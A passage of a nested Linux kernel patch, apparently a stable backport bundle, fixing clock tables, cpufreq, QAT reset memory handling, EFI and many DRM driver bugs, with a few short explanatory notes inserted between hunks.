+ 	F(400000000, P_MMPLL0, 2, 0, 0),
+ 	F(466800000, P_MMPLL1, 2.5, 0, 0),
++	{ }
+ };
+ 
+ static struct clk_rcg2 mmss_axi_clk_src = {
+@@ -303,6 +304,7 @@ static struct freq_tbl ftbl_ocmemnoc_clk[] = {
+ 	F(150000000, P_GPLL0, 4, 0, 0),
+ 	F(291750000, P_MMPLL1, 4, 0, 0),
+ 	F(400000000, P_MMPLL0, 2, 0, 0),
++	{ }
+ };
+ 
+ static struct clk_rcg2 ocmemnoc_clk_src = {
+diff --git a/drivers/clocksource/arm_global_timer.c b/drivers/clocksource/arm_global_timer.c
+index 44a61dc6f9320..e1c773bb55359 100644
+--- a/drivers/clocksource/arm_global_timer.c
++++ b/drivers/clocksource/arm_global_timer.c
+@@ -32,7 +32,7 @@
+ #define GT_CONTROL_IRQ_ENABLE		BIT(2)	/* banked */
+ #define GT_CONTROL_AUTO_INC		BIT(3)	/* banked */
+ #define GT_CONTROL_PRESCALER_SHIFT      8
+-#define GT_CONTROL_PRESCALER_MAX        0xF
++#define GT_CONTROL_PRESCALER_MAX        0xFF
+ #define GT_CONTROL_PRESCALER_MASK       (GT_CONTROL_PRESCALER_MAX << \
+ 					 GT_CONTROL_PRESCALER_SHIFT)
+ 
+diff --git a/drivers/cpufreq/amd-pstate.c b/drivers/cpufreq/amd-pstate.c
+index edc294ee5a5bc..90dcf26f09731 100644
+--- a/drivers/cpufreq/amd-pstate.c
++++ b/drivers/cpufreq/amd-pstate.c
+@@ -320,7 +320,7 @@ static void amd_pstate_adjust_perf(unsigned int cpu,
+ 	if (target_perf < capacity)
+ 		des_perf = DIV_ROUND_UP(cap_perf * target_perf, capacity);
+ 
+-	min_perf = READ_ONCE(cpudata->highest_perf);
++	min_perf = READ_ONCE(cpudata->lowest_perf);
+ 	if (_min_perf < capacity)
+ 		min_perf = DIV_ROUND_UP(cap_perf * _min_perf, capacity);
+ 
+diff --git a/drivers/cpufreq/brcmstb-avs-cpufreq.c b/drivers/cpufreq/brcmstb-avs-cpufreq.c
+index 38ec0fedb247f..552db816ed22c 100644
+--- a/drivers/cpufreq/brcmstb-avs-cpufreq.c
++++ b/drivers/cpufreq/brcmstb-avs-cpufreq.c
+@@ -481,10 +481,11 @@ static bool brcm_avs_is_firmware_loaded(struct private_data *priv)
+ static unsigned int brcm_avs_cpufreq_get(unsigned int cpu)
+ {
+ 	struct cpufreq_policy *policy = cpufreq_cpu_get(cpu);
++	struct private_data *priv;
++
+ 	if (!policy)
+ 		return 0;
+-	struct private_data *priv = policy->driver_data;
+-
++	priv = policy->driver_data;
+ 	cpufreq_cpu_put(policy);
+ 
+ 	return brcm_avs_get_frequency(priv->base);
+diff --git a/drivers/cpufreq/cpufreq-dt.c b/drivers/cpufreq/cpufreq-dt.c
+index 4aec4b2a52259..8f8f1949d66f6 100644
+--- a/drivers/cpufreq/cpufreq-dt.c
++++ b/drivers/cpufreq/cpufreq-dt.c
+@@ -208,7 +208,7 @@ static int dt_cpufreq_early_init(struct device *dev, int cpu)
+ 	if (!priv)
+ 		return -ENOMEM;
+ 
+-	if (!alloc_cpumask_var(&priv->cpus, GFP_KERNEL))
++	if (!zalloc_cpumask_var(&priv->cpus, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
+ 	cpumask_set_cpu(cpu, priv->cpus);
+diff --git a/drivers/crypto/qat/qat_common/adf_aer.c b/drivers/crypto/qat/qat_common/adf_aer.c
+index fe9bb2f3536a9..4f36b5a9164a7 100644
+--- a/drivers/crypto/qat/qat_common/adf_aer.c
++++ b/drivers/crypto/qat/qat_common/adf_aer.c
+@@ -95,18 +95,28 @@ static void adf_device_reset_worker(struct work_struct *work)
+ 	if (adf_dev_init(accel_dev) || adf_dev_start(accel_dev)) {
+ 		/* The device hung and we can't restart it, so stop here */
+ 		dev_err(&GET_DEV(accel_dev), "Restart device failed\n");
+-		kfree(reset_data);
++		if (reset_data->mode == ADF_DEV_RESET_ASYNC ||
++		    completion_done(&reset_data->compl))
++			kfree(reset_data);
+ 		WARN(1, "QAT: device restart failed. Device is unusable\n");
+ 		return;
+ 	}
+ 	adf_dev_restarted_notify(accel_dev);
+ 	clear_bit(ADF_STATUS_RESTARTING, &accel_dev->status);
+ 
+-	/* The dev is back alive. Notify the caller if in sync mode */
+-	if (reset_data->mode == ADF_DEV_RESET_SYNC)
+-		complete(&reset_data->compl);
+-	else
++	/*
++	 * The dev is back alive. Notify the caller if in sync mode.
++	 *
++	 * If the device restart takes more time than expected, the
++	 * schedule_reset() function can time out and exit. This can be
++	 * detected by calling the completion_done() function. In this case
++	 * the reset_data structure needs to be freed here.
++	 */
++	if (reset_data->mode == ADF_DEV_RESET_ASYNC ||
++	    completion_done(&reset_data->compl))
+ 		kfree(reset_data);
++	else
++		complete(&reset_data->compl);
+ }
+ 
+ static int adf_dev_aer_schedule_reset(struct adf_accel_dev *accel_dev,
+@@ -139,8 +149,9 @@ static int adf_dev_aer_schedule_reset(struct adf_accel_dev *accel_dev,
+ 			dev_err(&GET_DEV(accel_dev),
+ 				"Reset device timeout expired\n");
+ 			ret = -EFAULT;
++		} else {
++			kfree(reset_data);
+ 		}
+-		kfree(reset_data);
+ 		return ret;
+ 	}
+ 	return 0;
+diff --git a/drivers/firmware/efi/efi.c b/drivers/firmware/efi/efi.c
+index 9077353d1c98d..28d4defc5d0cd 100644
+--- a/drivers/firmware/efi/efi.c
++++ b/drivers/firmware/efi/efi.c
+@@ -194,6 +194,8 @@ static bool generic_ops_supported(void)
+ 
+ 	name_size = sizeof(name);
+ 
++	if (!efi.get_next_variable)
++		return false;
+ 	status = efi.get_next_variable(&name_size, &name, &guid);
+ 	if (status == EFI_UNSUPPORTED)
+ 		return false;
+diff --git a/drivers/firmware/efi/libstub/randomalloc.c b/drivers/firmware/efi/libstub/randomalloc.c
+index 7ba05719a53ba..fff826f56728c 100644
+--- a/drivers/firmware/efi/libstub/randomalloc.c
++++ b/drivers/firmware/efi/libstub/randomalloc.c
+@@ -119,7 +119,7 @@ efi_status_t efi_random_alloc(unsigned long size,
+ 			continue;
+ 		}
+ 
+-		target = round_up(md->phys_addr, align) + target_slot * align;
++		target = round_up(max_t(u64, md->phys_addr, alloc_min), align) + target_slot * align;
+ 		pages = size / EFI_PAGE_SIZE;
+ 
+ 		status = efi_bs_call(allocate_pages, EFI_ALLOCATE_ADDRESS,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+index 158b791883f03..dfb9d42007730 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+@@ -838,6 +838,7 @@ static void amdgpu_ttm_gart_bind(struct amdgpu_device *adev,
+ 		amdgpu_gart_bind(adev, gtt->offset, ttm->num_pages,
+ 				 gtt->ttm.dma_address, flags);
+ 	}
++	gtt->bound = true;
+ }
+ 
+ /*
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+index ec8a576ac5a9e..3c7d267f2a07b 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+@@ -1349,7 +1349,7 @@ void kfd_flush_tlb(struct kfd_process_device *pdd, enum TLB_FLUSH_TYPE type);
+ 
+ static inline bool kfd_flush_tlb_after_unmap(struct kfd_dev *dev)
+ {
+-	return KFD_GC_VERSION(dev) > IP_VERSION(9, 4, 2) ||
++	return KFD_GC_VERSION(dev) >= IP_VERSION(9, 4, 2) ||
+ 	       (KFD_GC_VERSION(dev) == IP_VERSION(9, 4, 1) && dev->sdma_fw_version >= 18) ||
+ 	       KFD_GC_VERSION(dev) == IP_VERSION(9, 4, 0);
+ }
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index a6c6f286a5988..ff460c9802eb2 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -10503,14 +10503,23 @@ void amdgpu_dm_update_freesync_caps(struct drm_connector *connector,
+ 				if (range->flags != 1)
+ 					continue;
+ 
+-				amdgpu_dm_connector->min_vfreq = range->min_vfreq;
+-				amdgpu_dm_connector->max_vfreq = range->max_vfreq;
+-				amdgpu_dm_connector->pixel_clock_mhz =
+-					range->pixel_clock_mhz * 10;
+-
+ 				connector->display_info.monitor_range.min_vfreq = range->min_vfreq;
+ 				connector->display_info.monitor_range.max_vfreq = range->max_vfreq;
+ 
++				if (edid->revision >= 4) {
++					if (data->pad2 & DRM_EDID_RANGE_OFFSET_MIN_VFREQ)
++						connector->display_info.monitor_range.min_vfreq += 255;
++					if (data->pad2 & DRM_EDID_RANGE_OFFSET_MAX_VFREQ)
++						connector->display_info.monitor_range.max_vfreq += 255;
++				}
++
++				amdgpu_dm_connector->min_vfreq =
++					connector->display_info.monitor_range.min_vfreq;
++				amdgpu_dm_connector->max_vfreq =
++					connector->display_info.monitor_range.max_vfreq;
++				amdgpu_dm_connector->pixel_clock_mhz =
++					range->pixel_clock_mhz * 10;
++
+ 				break;
+ 			}
+ 
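[Illustration, not part of the patch: the +255 adjustments above follow the EDID 1.4 range-limit encoding, where a set offset flag means the stored byte holds the rate minus 255. A one-line sketch of the decode:]

/* EDID 1.4 range descriptor: raw byte is (rate - 255) when flagged. */
static unsigned int decode_vfreq(unsigned char raw, int offset_flag)
{
	return raw + (offset_flag ? 255 : 0);	/* e.g. 45 -> 300 Hz */
}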
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+index 72bec33e371f3..0225b2c96041d 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+@@ -651,10 +651,20 @@ void dcn30_set_avmute(struct pipe_ctx *pipe_ctx, bool enable)
+ 	if (pipe_ctx == NULL)
+ 		return;
+ 
+-	if (dc_is_hdmi_signal(pipe_ctx->stream->signal) && pipe_ctx->stream_res.stream_enc != NULL)
++	if (dc_is_hdmi_signal(pipe_ctx->stream->signal) && pipe_ctx->stream_res.stream_enc != NULL) {
+ 		pipe_ctx->stream_res.stream_enc->funcs->set_avmute(
+ 				pipe_ctx->stream_res.stream_enc,
+ 				enable);
++
++		/* Wait for two frames to make sure AV mute is sent out */
++		if (enable) {
++			pipe_ctx->stream_res.tg->funcs->wait_for_state(pipe_ctx->stream_res.tg, CRTC_STATE_VACTIVE);
++			pipe_ctx->stream_res.tg->funcs->wait_for_state(pipe_ctx->stream_res.tg, CRTC_STATE_VBLANK);
++			pipe_ctx->stream_res.tg->funcs->wait_for_state(pipe_ctx->stream_res.tg, CRTC_STATE_VACTIVE);
++			pipe_ctx->stream_res.tg->funcs->wait_for_state(pipe_ctx->stream_res.tg, CRTC_STATE_VBLANK);
++			pipe_ctx->stream_res.tg->funcs->wait_for_state(pipe_ctx->stream_res.tg, CRTC_STATE_VACTIVE);
++		}
++	}
+ }
+ 
+ void dcn30_update_info_frame(struct pipe_ctx *pipe_ctx)
+diff --git a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_psp.c b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_psp.c
+index ee67a35c2a8ed..ff930a71e496a 100644
+--- a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_psp.c
++++ b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_psp.c
+@@ -513,6 +513,9 @@ enum mod_hdcp_status mod_hdcp_hdcp2_create_session(struct mod_hdcp *hdcp)
+ 	hdcp_cmd = (struct ta_hdcp_shared_memory *)psp->hdcp_context.context.mem_context.shared_buf;
+ 	memset(hdcp_cmd, 0, sizeof(struct ta_hdcp_shared_memory));
+ 
++	if (!display)
++		return MOD_HDCP_STATUS_DISPLAY_NOT_FOUND;
++
+ 	hdcp_cmd->in_msg.hdcp2_create_session_v2.display_handle = display->index;
+ 
+ 	if (hdcp->connection.link.adjust.hdcp2.force_type == MOD_HDCP_FORCE_TYPE_0)
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_pm.c b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+index 29f3d8431089e..cdb406690b7e7 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_pm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+@@ -2344,6 +2344,7 @@ static ssize_t amdgpu_hwmon_set_pwm1_enable(struct device *dev,
+ {
+ 	struct amdgpu_device *adev = dev_get_drvdata(dev);
+ 	int err, ret;
++	u32 pwm_mode;
+ 	int value;
+ 
+ 	if (amdgpu_in_reset(adev))
+@@ -2355,13 +2356,22 @@ static ssize_t amdgpu_hwmon_set_pwm1_enable(struct device *dev,
+ 	if (err)
+ 		return err;
+ 
++	if (value == 0)
++		pwm_mode = AMD_FAN_CTRL_NONE;
++	else if (value == 1)
++		pwm_mode = AMD_FAN_CTRL_MANUAL;
++	else if (value == 2)
++		pwm_mode = AMD_FAN_CTRL_AUTO;
++	else
++		return -EINVAL;
++
+ 	ret = pm_runtime_get_sync(adev_to_drm(adev)->dev);
+ 	if (ret < 0) {
+ 		pm_runtime_put_autosuspend(adev_to_drm(adev)->dev);
+ 		return ret;
+ 	}
+ 
+-	ret = amdgpu_dpm_set_fan_control_mode(adev, value);
++	ret = amdgpu_dpm_set_fan_control_mode(adev, pwm_mode);
+ 
+ 	pm_runtime_mark_last_busy(adev_to_drm(adev)->dev);
+ 	pm_runtime_put_autosuspend(adev_to_drm(adev)->dev);
+diff --git a/drivers/gpu/drm/drm_panel.c b/drivers/gpu/drm/drm_panel.c
+index f634371c717a8..7fd3de89ed079 100644
+--- a/drivers/gpu/drm/drm_panel.c
++++ b/drivers/gpu/drm/drm_panel.c
+@@ -207,19 +207,24 @@ EXPORT_SYMBOL(drm_panel_disable);
+  * The modes probed from the panel are automatically added to the connector
+  * that the panel is attached to.
+  *
+- * Return: The number of modes available from the panel on success or a
+- * negative error code on failure.
++ * Return: The number of modes available from the panel on success, or 0 on
++ * failure (no modes).
+  */
+ int drm_panel_get_modes(struct drm_panel *panel,
+ 			struct drm_connector *connector)
+ {
+ 	if (!panel)
+-		return -EINVAL;
++		return 0;
+ 
+-	if (panel->funcs && panel->funcs->get_modes)
+-		return panel->funcs->get_modes(panel, connector);
++	if (panel->funcs && panel->funcs->get_modes) {
++		int num;
+ 
+-	return -EOPNOTSUPP;
++		num = panel->funcs->get_modes(panel, connector);
++		if (num > 0)
++			return num;
++	}
++
++	return 0;
+ }
+ EXPORT_SYMBOL(drm_panel_get_modes);
+ 
+diff --git a/drivers/gpu/drm/drm_probe_helper.c b/drivers/gpu/drm/drm_probe_helper.c
+index 3b968ad187cf3..52dbaf74fe164 100644
+--- a/drivers/gpu/drm/drm_probe_helper.c
++++ b/drivers/gpu/drm/drm_probe_helper.c
+@@ -362,6 +362,13 @@ static int drm_helper_probe_get_modes(struct drm_connector *connector)
+ 
+ 	count = connector_funcs->get_modes(connector);
+ 
++	/* The .get_modes() callback should not return negative values. */
++	if (count < 0) {
++		drm_err(connector->dev, ".get_modes() returned %pe\n",
++			ERR_PTR(count));
++		count = 0;
++	}
++
+ 	/*
+ 	 * Fallback for when DDC probe failed in drm_get_edid() and thus skipped
+ 	 * override/firmware EDID.
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_drv.c b/drivers/gpu/drm/etnaviv/etnaviv_drv.c
+index 1d2b4fb4bcf8b..f29952a55c05d 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_drv.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_drv.c
+@@ -488,7 +488,7 @@ static const struct drm_driver etnaviv_drm_driver = {
+ 	.desc               = "etnaviv DRM",
+ 	.date               = "20151214",
+ 	.major              = 1,
+-	.minor              = 3,
++	.minor              = 4,
+ };
+ 
+ /*
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_hwdb.c b/drivers/gpu/drm/etnaviv/etnaviv_hwdb.c
+index f2fc645c79569..212e7050c4ba6 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_hwdb.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_hwdb.c
+@@ -135,6 +135,9 @@ static const struct etnaviv_chip_identity etnaviv_chip_identities[] = {
+ bool etnaviv_fill_identity_from_hwdb(struct etnaviv_gpu *gpu)
+ {
+ 	struct etnaviv_chip_identity *ident = &gpu->identity;
++	const u32 product_id = ident->product_id;
++	const u32 customer_id = ident->customer_id;
++	const u32 eco_id = ident->eco_id;
+ 	int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(etnaviv_chip_identities); i++) {
+@@ -148,6 +151,12 @@ bool etnaviv_fill_identity_from_hwdb(struct etnaviv_gpu *gpu)
+ 			 etnaviv_chip_identities[i].eco_id == ~0U)) {
+ 			memcpy(ident, &etnaviv_chip_identities[i],
+ 			       sizeof(*ident));
++
++			/* Restore some id values as ~0U aka 'don't care' might have been used. */
++			ident->product_id = product_id;
++			ident->customer_id = customer_id;
++			ident->eco_id = eco_id;
++
+ 			return true;
+ 		}
+ 	}
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_vidi.c b/drivers/gpu/drm/exynos/exynos_drm_vidi.c
+index f5e1adfcaa514..fb941a8c99f0f 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_vidi.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_vidi.c
+@@ -316,14 +316,14 @@ static int vidi_get_modes(struct drm_connector *connector)
+ 	 */
+ 	if (!ctx->raw_edid) {
+ 		DRM_DEV_DEBUG_KMS(ctx->dev, "raw_edid is null.\n");
+-		return -EFAULT;
++		return 0;
+ 	}
+ 
+ 	edid_len = (1 + ctx->raw_edid->extensions) * EDID_LENGTH;
+ 	edid = kmemdup(ctx->raw_edid, edid_len, GFP_KERNEL);
+ 	if (!edid) {
+ 		DRM_DEV_DEBUG_KMS(ctx->dev, "failed to allocate edid\n");
+-		return -ENOMEM;
++		return 0;
+ 	}
+ 
+ 	drm_connector_update_edid_property(connector, edid);
+diff --git a/drivers/gpu/drm/exynos/exynos_hdmi.c b/drivers/gpu/drm/exynos/exynos_hdmi.c
+index 1a7194a653ae5..be2d9cbaaef2e 100644
+--- a/drivers/gpu/drm/exynos/exynos_hdmi.c
++++ b/drivers/gpu/drm/exynos/exynos_hdmi.c
+@@ -887,11 +887,11 @@ static int hdmi_get_modes(struct drm_connector *connector)
+ 	int ret;
+ 
+ 	if (!hdata->ddc_adpt)
+-		return -ENODEV;
++		return 0;
+ 
+ 	edid = drm_get_edid(connector, hdata->ddc_adpt);
+ 	if (!edid)
+-		return -ENODEV;
++		return 0;
+ 
+ 	hdata->dvi_mode = !connector->display_info.is_hdmi;
+ 	DRM_DEV_DEBUG_KMS(hdata->dev, "%s : width[%d] x height[%d]\n",
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.c b/drivers/gpu/drm/i915/display/intel_bios.c
+index a70b7061742a8..9cc1ef2ca72cc 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.c
++++ b/drivers/gpu/drm/i915/display/intel_bios.c
+@@ -3413,6 +3413,9 @@ static bool intel_bios_encoder_supports_dp_dual_mode(const struct intel_bios_enc
+ {
+ 	const struct child_device_config *child = &devdata->child;
+ 
++	if (!devdata)
++		return false;
++
+ 	if (!intel_bios_encoder_supports_dp(devdata) ||
+ 	    !intel_bios_encoder_supports_hdmi(devdata))
+ 		return false;
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_userptr.c b/drivers/gpu/drm/i915/gem/i915_gem_userptr.c
+index ba14b18d65f38..2e7c52c2e47dd 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_userptr.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_userptr.c
+@@ -378,6 +378,9 @@ i915_gem_userptr_release(struct drm_i915_gem_object *obj)
+ {
+ 	GEM_WARN_ON(obj->userptr.page_ref);
+ 
++	if (!obj->userptr.notifier.mm)
++		return;
++
+ 	mmu_interval_notifier_remove(&obj->userptr.notifier);
+ 	obj->userptr.notifier.mm = NULL;
+ }
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine_pm.c b/drivers/gpu/drm/i915/gt/intel_engine_pm.c
+index b0a4a2dbe3ee9..feb0fc32a19ae 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine_pm.c
++++ b/drivers/gpu/drm/i915/gt/intel_engine_pm.c
+@@ -253,9 +253,6 @@ static int __engine_park(struct intel_wakeref *wf)
+ 	intel_engine_park_heartbeat(engine);
+ 	intel_breadcrumbs_park(engine->breadcrumbs);
+ 
+-	/* Must be reset upon idling, or we may miss the busy wakeup. */
+-	GEM_BUG_ON(engine->sched_engine->queue_priority_hint != INT_MIN);
+-
+ 	if (engine->park)
+ 		engine->park(engine);
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+index f903ee1ce06e7..eae138b9f2df3 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+@@ -3270,6 +3270,9 @@ static void execlists_park(struct intel_engine_cs *engine)
+ {
+ 	cancel_timer(&engine->execlists.timer);
+ 	cancel_timer(&engine->execlists.preempt);
++
++	/* Reset upon idling, or we may delay the busy wakeup. */
++	WRITE_ONCE(engine->sched_engine->queue_priority_hint, INT_MIN);
+ }
+ 
+ static void add_to_engine(struct i915_request *rq)
+diff --git a/drivers/gpu/drm/imx/parallel-display.c b/drivers/gpu/drm/imx/parallel-display.c
+index 06723b2e9b847..64b6bc2de873e 100644
+--- a/drivers/gpu/drm/imx/parallel-display.c
++++ b/drivers/gpu/drm/imx/parallel-display.c
+@@ -72,14 +72,14 @@ static int imx_pd_connector_get_modes(struct drm_connector *connector)
+ 		int ret;
+ 
+ 		if (!mode)
+-			return -EINVAL;
++			return 0;
+ 
+ 		ret = of_get_drm_display_mode(np, &imxpd->mode,
+ 					      &imxpd->bus_flags,
+ 					      OF_USE_NATIVE_MODE);
+ 		if (ret) {
+ 			drm_mode_destroy(connector->dev, mode);
+-			return ret;
++			return 0;
+ 		}
+ 
+ 		drm_mode_copy(mode, &imxpd->mode);
+diff --git a/drivers/gpu/drm/nouveau/nouveau_dmem.c b/drivers/gpu/drm/nouveau/nouveau_dmem.c
+index 20fe53815b20f..6ca4a46a82ee9 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_dmem.c
++++ b/drivers/gpu/drm/nouveau/nouveau_dmem.c
+@@ -379,9 +379,9 @@ nouveau_dmem_evict_chunk(struct nouveau_dmem_chunk *chunk)
+ 	dma_addr_t *dma_addrs;
+ 	struct nouveau_fence *fence;
+ 
+-	src_pfns = kcalloc(npages, sizeof(*src_pfns), GFP_KERNEL);
+-	dst_pfns = kcalloc(npages, sizeof(*dst_pfns), GFP_KERNEL);
+-	dma_addrs = kcalloc(npages, sizeof(*dma_addrs), GFP_KERNEL);
++	src_pfns = kvcalloc(npages, sizeof(*src_pfns), GFP_KERNEL | __GFP_NOFAIL);
++	dst_pfns = kvcalloc(npages, sizeof(*dst_pfns), GFP_KERNEL | __GFP_NOFAIL);
++	dma_addrs = kvcalloc(npages, sizeof(*dma_addrs), GFP_KERNEL | __GFP_NOFAIL);
+ 
+ 	migrate_device_range(src_pfns, chunk->pagemap.range.start >> PAGE_SHIFT,
+ 			npages);
+@@ -407,11 +407,11 @@ nouveau_dmem_evict_chunk(struct nouveau_dmem_chunk *chunk)
+ 	migrate_device_pages(src_pfns, dst_pfns, npages);
+ 	nouveau_dmem_fence_done(&fence);
+ 	migrate_device_finalize(src_pfns, dst_pfns, npages);
+-	kfree(src_pfns);
+-	kfree(dst_pfns);
++	kvfree(src_pfns);
++	kvfree(dst_pfns);
+ 	for (i = 0; i < npages; i++)
+ 		dma_unmap_page(chunk->drm->dev->dev, dma_addrs[i], PAGE_SIZE, DMA_BIDIRECTIONAL);
+-	kfree(dma_addrs);
++	kvfree(dma_addrs);
+ }
+ 
+ void
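[Context for the allocator swap above, not part of the patch: kvcalloc() falls back from kmalloc to vmalloc for allocations too large for the slab path, and __GFP_NOFAIL makes the request block until it succeeds rather than return NULL, which is why the hunk drops no NULL handling. Kernel-style sketch; assumes <linux/mm.h>.]

static unsigned long *alloc_pfn_array(unsigned long npages)
{
	/* Never returns NULL; may be vmalloc-backed, so pair with kvfree(). */
	return kvcalloc(npages, sizeof(unsigned long),
			GFP_KERNEL | __GFP_NOFAIL);
}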
+diff --git a/drivers/gpu/drm/vc4/vc4_hdmi.c b/drivers/gpu/drm/vc4/vc4_hdmi.c
+index ea2eaf6032caa..f696818913499 100644
+--- a/drivers/gpu/drm/vc4/vc4_hdmi.c
++++ b/drivers/gpu/drm/vc4/vc4_hdmi.c
+@@ -497,7 +497,7 @@ static int vc4_hdmi_connector_get_modes(struct drm_connector *connector)
+ 	edid = drm_get_edid(connector, vc4_hdmi->ddc);
+ 	cec_s_phys_addr_from_edid(vc4_hdmi->cec_adap, edid);
+ 	if (!edid)
+-		return -ENODEV;
++		return 0;
+ 
+ 	drm_connector_update_edid_property(connector, edid);
+ 	ret = drm_add_edid_modes(connector, edid);
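
The two hunks above (imx parallel-display and vc4 HDMI) apply the same DRM rule: a connector's .get_modes() hook returns the number of modes it added, so failure paths must return 0 ("no modes") rather than a negative errno that callers would misread as a count. A minimal sketch of the convention; probe_edid() and count_edid_modes() are invented stand-ins for drm_get_edid() and drm_add_edid_modes():

#include <stdio.h>

struct edid;                            /* opaque, illustration only */

static struct edid *probe_edid(void)
{
	return NULL;                    /* pretend no EDID was returned */
}

static int count_edid_modes(const struct edid *edid)
{
	return edid ? 8 : 0;            /* pretend 8 modes were parsed */
}

/* Mirrors the fixed convention: report how many modes were added;
 * on any failure report 0, never -errno. */
static int example_get_modes(void)
{
	struct edid *edid = probe_edid();

	if (!edid)
		return 0;               /* was -ENODEV / -EINVAL before */

	return count_edid_modes(edid);
}

int main(void)
{
	printf("%d modes\n", example_get_modes());
	return 0;
}
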
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+index b909a3ce9af3c..9d7a1b710f48f 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+@@ -1429,12 +1429,15 @@ static void vmw_debugfs_resource_managers_init(struct vmw_private *vmw)
+ 					    root, "system_ttm");
+ 	ttm_resource_manager_create_debugfs(ttm_manager_type(&vmw->bdev, TTM_PL_VRAM),
+ 					    root, "vram_ttm");
+-	ttm_resource_manager_create_debugfs(ttm_manager_type(&vmw->bdev, VMW_PL_GMR),
+-					    root, "gmr_ttm");
+-	ttm_resource_manager_create_debugfs(ttm_manager_type(&vmw->bdev, VMW_PL_MOB),
+-					    root, "mob_ttm");
+-	ttm_resource_manager_create_debugfs(ttm_manager_type(&vmw->bdev, VMW_PL_SYSTEM),
+-					    root, "system_mob_ttm");
++	if (vmw->has_gmr)
++		ttm_resource_manager_create_debugfs(ttm_manager_type(&vmw->bdev, VMW_PL_GMR),
++						    root, "gmr_ttm");
++	if (vmw->has_mob) {
++		ttm_resource_manager_create_debugfs(ttm_manager_type(&vmw->bdev, VMW_PL_MOB),
++						    root, "mob_ttm");
++		ttm_resource_manager_create_debugfs(ttm_manager_type(&vmw->bdev, VMW_PL_SYSTEM),
++						    root, "system_mob_ttm");
++	}
+ }
+ 
+ static int vmwgfx_pm_notifier(struct notifier_block *nb, unsigned long val,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+index bc7f02e4ecebb..2f7ac91149fc0 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+@@ -447,7 +447,7 @@ static int vmw_resource_context_res_add(struct vmw_private *dev_priv,
+ 	    vmw_res_type(ctx) == vmw_res_dx_context) {
+ 		for (i = 0; i < cotable_max; ++i) {
+ 			res = vmw_context_cotable(ctx, i);
+-			if (IS_ERR(res))
++			if (IS_ERR_OR_NULL(res))
+ 				continue;
+ 
+ 			ret = vmw_execbuf_res_val_add(sw_context, res,
+@@ -1259,6 +1259,8 @@ static int vmw_cmd_dx_define_query(struct vmw_private *dev_priv,
+ 		return -EINVAL;
+ 
+ 	cotable_res = vmw_context_cotable(ctx_node->ctx, SVGA_COTABLE_DXQUERY);
++	if (IS_ERR_OR_NULL(cotable_res))
++		return cotable_res ? PTR_ERR(cotable_res) : -EINVAL;
+ 	ret = vmw_cotable_notify(cotable_res, cmd->body.queryId);
+ 
+ 	return ret;
+@@ -2477,6 +2479,8 @@ static int vmw_cmd_dx_view_define(struct vmw_private *dev_priv,
+ 		return ret;
+ 
+ 	res = vmw_context_cotable(ctx_node->ctx, vmw_view_cotables[view_type]);
++	if (IS_ERR_OR_NULL(res))
++		return res ? PTR_ERR(res) : -EINVAL;
+ 	ret = vmw_cotable_notify(res, cmd->defined_id);
+ 	if (unlikely(ret != 0))
+ 		return ret;
+@@ -2562,8 +2566,8 @@ static int vmw_cmd_dx_so_define(struct vmw_private *dev_priv,
+ 
+ 	so_type = vmw_so_cmd_to_type(header->id);
